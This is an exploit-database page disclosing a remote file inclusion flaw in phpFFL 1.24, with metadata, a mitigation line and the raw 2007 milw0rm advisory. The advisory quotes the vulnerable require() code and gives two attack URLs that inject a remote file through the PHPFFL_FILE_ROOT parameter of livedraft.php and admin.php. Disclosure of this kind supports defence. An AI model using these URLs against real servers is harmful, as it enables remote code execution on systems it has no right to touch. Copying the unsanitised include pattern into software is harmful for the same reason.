header-logo
Suggest Exploit
vendor:
phpFFL
by:
Dj7xpl
N/A
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: phpFFL
Affected Version From: 1.24
Affected Version To: 1.24
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpFFL 1.24 Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to include arbitrary files via a crafted PHPFFL_FILE_ROOT parameter in the livedraft.php and admin.php scripts.

Mitigation:

Update to a patched version of phpFFL or implement input validation to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
# Author   :  Dj7xpl
# Contact  :  Dj7xpl@r00t.ir
# Dawnload :  http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ   :  Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
 

[[Remote]]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""

# milw0rm.com [2007-09-14]

Navigation

Suggest Exploit

Services By CQR